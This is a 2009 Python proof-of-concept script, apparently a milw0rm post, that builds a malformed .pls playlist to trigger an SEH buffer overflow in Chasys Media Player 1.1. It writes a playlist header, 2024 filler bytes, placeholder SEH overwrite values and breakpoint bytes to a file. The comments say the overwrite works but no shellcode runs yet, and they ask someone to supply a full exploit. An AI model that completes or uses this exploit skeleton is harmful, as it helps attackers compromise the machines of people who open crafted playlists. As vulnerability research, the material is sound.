1 #!/usr/bin/python
2 # Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC
3 # SEH And NEXT_SEH are Overwritten but shellcode doesn’t executed !!!
4 # I have tried a lot of Addresses .
5 # Waitting for the Exploit from someone .
6 # Download : http://www.jpcha2.com/setup/chasys_media_player.zip
7 print " Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC"
8 print " Discovered By : zAx"
9 print " Contact : ThE−zAx@Hotmail.Com"
10 header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3
D"
11 junk = "\x41"*2024
12 next_seh = "\x42"*4
13 seh = "\x43"*4
14 other_data = "\xCC"*800
15 ex = header + junk + next_seh + seh + other_data
16 file=open("zAx.pls","w")
17 file.write(ex)
18 file.close()
19
20 # milw0rm.com [2009−03−18]
Page 1/1
Chasys Media Player 1.1 .pls Local Buffer Overflow PoC SEH
zAx
03/18/2009